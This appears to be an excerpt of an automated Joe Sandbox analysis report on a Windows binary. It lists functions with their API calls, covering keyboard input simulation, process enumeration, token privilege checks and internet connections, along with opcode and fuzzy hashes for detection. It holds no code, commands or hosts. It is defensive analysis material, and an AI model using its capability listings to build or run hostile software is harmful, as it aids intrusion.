CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B0B915

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: d064ef2405052057a598a3d94c723865653fce18e2827b672b5987ff941c1d3f
Instruction ID: dcae3464401ee4e72dc899e37b4c3e5e621094e97d0cdac7c51da55eeb3eea39
Opcode Fuzzy Hash: d064ef2405052057a598a3d94c723865653fce18e2827b672b5987ff941c1d3f
Instruction Fuzzy Hash: 2F412C35600611DFCB11EF15C584A5ABBF5EF8A710F098098ED4A9B3A2CB34FD01CB91

Function 00B28851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B288DE

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 682adbe7ad92e635b1c753c568127ba0338a4669343663415d45665fe2a80589
Instruction ID: 14685ca9da466944770103000b2f1a5acb36433dfcc3c01bdf91228a99adadbe
Opcode Fuzzy Hash: 682adbe7ad92e635b1c753c568127ba0338a4669343663415d45665fe2a80589
Instruction Fuzzy Hash: 6B31F434602128AFEF309A58EC85FB837E5EB09310F544592F959EB1E1CE74D990DB52

Function 00B2AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00B2AB60
GetWindowRect.USER32(?,?), ref: 00B2ABD6
PtInRect.USER32(?,?,00B2C014), ref: 00B2ABE6
MessageBeep.USER32(00000000), ref: 00B2AC57

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 48e2af6114780a24c3a11fa09462dc4c88bf77d212ec22da95b8d1f2da7f23ee
Instruction ID: 73a8a612333adc4c2e580131fab44e015f014ee956f5a0405ee0d224c9cd5af5
Opcode Fuzzy Hash: 48e2af6114780a24c3a11fa09462dc4c88bf77d212ec22da95b8d1f2da7f23ee
Instruction Fuzzy Hash: 5E416D30600129DFCB21DF58E894B69BBF5FB89710F1880E9E859DB264DB70A941CB92

Function 00B00AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00B00B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00B00B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00B00BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00B00BFB

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: e23478369b8d78cba537c9e4fe421b3d175c95aad0b696d73a4a2c3e26da9dd4
Instruction ID: 569b14c9df9da46aaa079f7c0138725c4c3c051a2aed5a87a12d699e402ca4cd
Opcode Fuzzy Hash: e23478369b8d78cba537c9e4fe421b3d175c95aad0b696d73a4a2c3e26da9dd4
Instruction Fuzzy Hash: 3E313830D60218AEFF31AB698C05BFABFE9EB45318F0843EAF591521D1C7B589419751

Function 00B00C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7608C0D0,?,00008000), ref: 00B00C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00B00C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00B00CE1
SendInput.USER32(00000001,?,0000001C,7608C0D0,?,00008000), ref: 00B00D33

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 7438c2dc16ebe30672b9873443b37679bc08dbac33f7122932227e45e6cf6f9d
Instruction ID: ba7c1a29bd51d0b71e7fb25d20a7da22927b831d603357576e347037f2b3e9ad
Opcode Fuzzy Hash: 7438c2dc16ebe30672b9873443b37679bc08dbac33f7122932227e45e6cf6f9d
Instruction Fuzzy Hash: 783146309102186EFF34AB648814BFEBFF6EB45310F0443ABE881521D1C37599558761

Function 00AD61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00AD61FB
__isleadbyte_l.LIBCMT ref: 00AD6229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00AD6257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00AD628D

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 22f728bd83f8cee26e86fe74a194a9fd5d7298db9f76566de9dd8eb40515a73e
Instruction ID: da77085f4a880597870bebe753a4747920c654c4fa9773a7fbabcc4cf6416644
Opcode Fuzzy Hash: 22f728bd83f8cee26e86fe74a194a9fd5d7298db9f76566de9dd8eb40515a73e
Instruction Fuzzy Hash: 3D31EF31A00246EFEF218F65CC45BBA7BB9FF41310F15412AF866972A1EB30E950DB90

Function 00B24EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00B24F02

Part of subcall function 00B03641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B0365B
Part of subcall function 00B03641: GetCurrentThreadId.KERNEL32 ref: 00B03662
Part of subcall function 00B03641: AttachThreadInput.USER32(00000000,?,00B05005), ref: 00B03669

GetCaretPos.USER32(?), ref: 00B24F13
ClientToScreen.USER32(00000000,?), ref: 00B24F4E
GetForegroundWindow.USER32 ref: 00B24F54

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: a144e46039eb9826107ee01d348bbe378e00602f8582a91a668bb77a15b5eab4
Instruction ID: 2d5099d184abfdc1f9493c2a4e29dd9a1dfbf9b3c2df004aa2f21328d02fd31f
Opcode Fuzzy Hash: a144e46039eb9826107ee01d348bbe378e00602f8582a91a668bb77a15b5eab4
Instruction Fuzzy Hash: 28313E72D00108AFDB10EFA5C9859EFB7FDEF99300F10406AE415E7241DB759E458BA0

Function 00B03C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00B03C7A
Process32FirstW.KERNEL32(00000000,?), ref: 00B03C88
Process32NextW.KERNEL32(00000000,?), ref: 00B03CA8
CloseHandle.KERNEL32(00000000), ref: 00B03D52

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: cc2fdab01182b398982e4b9c7208fd7f4f0953ca6a262fff764a4060ad48ced9
Instruction ID: 9580fbde1d800335076fd60f2fb78090f46074c2f1b78dfbe6bf5225143be1e6
Opcode Fuzzy Hash: cc2fdab01182b398982e4b9c7208fd7f4f0953ca6a262fff764a4060ad48ced9
Instruction Fuzzy Hash: B831AB711083059FD310EF60C985ABFBBE8EF9A314F50092DF482871E1EB719A49CB92

Function 00B2C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

GetCursorPos.USER32(?), ref: 00B2C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00ADB9AB,?,?,?,?,?), ref: 00B2C4E7
GetCursorPos.USER32(?), ref: 00B2C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00ADB9AB,?,?,?), ref: 00B2C56E

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 5b6ab3a922598e1a952dcb6602536d3a06e7dcc8d49e3a670c89ed48baf72bf6
Instruction ID: ae8d04b703e0fb4523b4df31ae19c5c04c7f0da379e9af6fbd371b76a4e9e96e
Opcode Fuzzy Hash: 5b6ab3a922598e1a952dcb6602536d3a06e7dcc8d49e3a670c89ed48baf72bf6
Instruction Fuzzy Hash: DC319335500028AFCB25CF58D859EBE7FF5EB49350F0440A5F9098B2A1CB35AD61DBA4

Function 00AF8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AF810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AF8121
Part of subcall function 00AF810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AF812B
Part of subcall function 00AF810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF813A
Part of subcall function 00AF810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8141
Part of subcall function 00AF810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00AF86A3
_memcmp.LIBCMT ref: 00AF86C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AF86FC
HeapFree.KERNEL32(00000000), ref: 00AF8703

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 13a9e70a1293ebf1333010e677130219ebd675bcea63da8dc12d78f215ad4fb0
Instruction ID: 37d38cc7011d9ed8f1f6ab7a5a5839a505f42d67e11adde92012891066aa9f3e
Opcode Fuzzy Hash: 13a9e70a1293ebf1333010e677130219ebd675bcea63da8dc12d78f215ad4fb0
Instruction Fuzzy Hash: 72216972E40109EBDB10DFA4CA49BFEB7B8EF44305F154069E644AB241EB38AE05CB90

Function 00AC098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00AC09AE

Part of subcall function 00AA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B07896,?,?,00000000), ref: 00AA5A2C
Part of subcall function 00AA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B07896,?,?,00000000,?,?), ref: 00AA5A50

_fprintf.LIBCMT ref: 00AC09E5
OutputDebugStringW.KERNEL32(?), ref: 00AF5DBB

Part of subcall function 00AC4AAA: _flsall.LIBCMT ref: 00AC4AC3

__setmode.LIBCMT ref: 00AC0A1A

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 8849fd8e67c50ee7aefa5592cc55b00ee23ccba297bbefc29ad10b5d2760d104
Instruction ID: 1dccbfe7897d370308e441de4ced488f7f8129224a3a54ce0107c0dd6d210ad8
Opcode Fuzzy Hash: 8849fd8e67c50ee7aefa5592cc55b00ee23ccba297bbefc29ad10b5d2760d104
Instruction Fuzzy Hash: 6C112431A04208BFDB04B7B89C46EBE7BA89F4A360F21006DF205671C2EF704D4687A9

Function 00B11767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B117A3

Part of subcall function 00B1182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B1184C
Part of subcall function 00B1182D: InternetCloseHandle.WININET(00000000), ref: 00B118E9

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: b3402b37302e0074ad2be3ebdbbf0d8af231cad43cfef032fc11868dac4d369e
Instruction ID: 17dfaa2ec2c2bd391a67940063beb396b9f3b6e334da3b79d3b131d33f214469
Opcode Fuzzy Hash: b3402b37302e0074ad2be3ebdbbf0d8af231cad43cfef032fc11868dac4d369e
Instruction Fuzzy Hash: 0F21A471200605BFEB129F64DC41FFABBE9FF48710F50446AFB1196660DB71986197A0

Function 00B03A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00B2FAC0), ref: 00B03A64
GetLastError.KERNEL32 ref: 00B03A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 00B03A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00B2FAC0), ref: 00B03ADF

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: c3f19b6cb4e3070d8ca1bbd8dc4c07b8f0500a0c52d68aa44211956be3a1f20f
Instruction ID: c7387588c06d93bdbd3e0964e8172d9a5b0844e8ad82559d07086b3090b085c3
Opcode Fuzzy Hash: c3f19b6cb4e3070d8ca1bbd8dc4c07b8f0500a0c52d68aa44211956be3a1f20f
Instruction Fuzzy Hash: 652180346082029FC310DF28C98586F7BF8EE56B64F104A69F499C72E1DB31DE46CB82

Function 00AFDCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00AFF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00AFDCD3,?,?,?,00AFEAC6,00000000,000000EF,00000119,?,?), ref: 00AFF0CB
Part of subcall function 00AFF0BC: lstrcpyW.KERNEL32(00000000,?,?,00AFDCD3,?,?,?,00AFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00AFF0F1
Part of subcall function 00AFF0BC: lstrcmpiW.KERNEL32(00000000,?,00AFDCD3,?,?,?,00AFEAC6,00000000,000000EF,00000119,?,?), ref: 00AFF122

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00AFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00AFDCEC
lstrcpyW.KERNEL32(00000000,?,?,00AFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00AFDD12
lstrcmpiW.KERNEL32(00000002,cdecl,?,00AFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00AFDD46

Strings

cdecl, xrefs: 00AFDD3D

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: eeeff9b6b149c4895781125edf71dd88aa33b0f8a15c5a5da230840f9b13802c
Instruction ID: 70bdc456f3731074e2c36aede0fbd4f5f9f3bdd2f4f6442555c3063daedbaa4f
Opcode Fuzzy Hash: eeeff9b6b149c4895781125edf71dd88aa33b0f8a15c5a5da230840f9b13802c
Instruction Fuzzy Hash: B511BE3A200309EFCB269FB4D845E7A77B9FF45750B40806AFA06CB2A0EF719851C791

Function 00AD50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00AD5101

Part of subcall function 00AC571C: __FF_MSGBANNER.LIBCMT ref: 00AC5733
Part of subcall function 00AC571C: __NMSG_WRITE.LIBCMT ref: 00AC573A
Part of subcall function 00AC571C: RtlAllocateHeap.NTDLL(014A0000,00000000,00000001,00000000,?,?,?,00AC0DD3,?), ref: 00AC575F

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: e23779205337cd25a2e7029804e31035c50e521fd2e6f4e0857320394f2af38f
Instruction ID: c935fb78f1970c1896c78264fdd1b70d4fddd0e3cac6f3f22a223675050b7092
Opcode Fuzzy Hash: e23779205337cd25a2e7029804e31035c50e521fd2e6f4e0857320394f2af38f
Instruction Fuzzy Hash: 0611A372D04A12AECF313FB4AD45B6E3BA8AB143A1B11462FF9069A390DE348D418790

Function 00B16369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B07896,?,?,00000000), ref: 00AA5A2C
Part of subcall function 00AA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B07896,?,?,00000000,?,?), ref: 00AA5A50

gethostbyname.WSOCK32(?,?,?), ref: 00B16399
WSAGetLastError.WSOCK32(00000000), ref: 00B163A4
_memmove.LIBCMT ref: 00B163D1
inet_ntoa.WSOCK32(?), ref: 00B163DC

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 1e0acf64eb46f30d1d8142c2bfa469fb605ab77b3edad939c77d426f278ffc8b
Instruction ID: 695e0398ed20b0022582a1b489f4dfc7d6d4a6dfb01a42a333b76e92718fdd81
Opcode Fuzzy Hash: 1e0acf64eb46f30d1d8142c2bfa469fb605ab77b3edad939c77d426f278ffc8b
Instruction Fuzzy Hash: DD115B32900109AFCB00FBA4DE86DEFB7B8AF09310B544065F506AB2A1DF30AE05DB61

Function 00AF8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00AF8B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AF8B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AF8B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AF8BA4

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

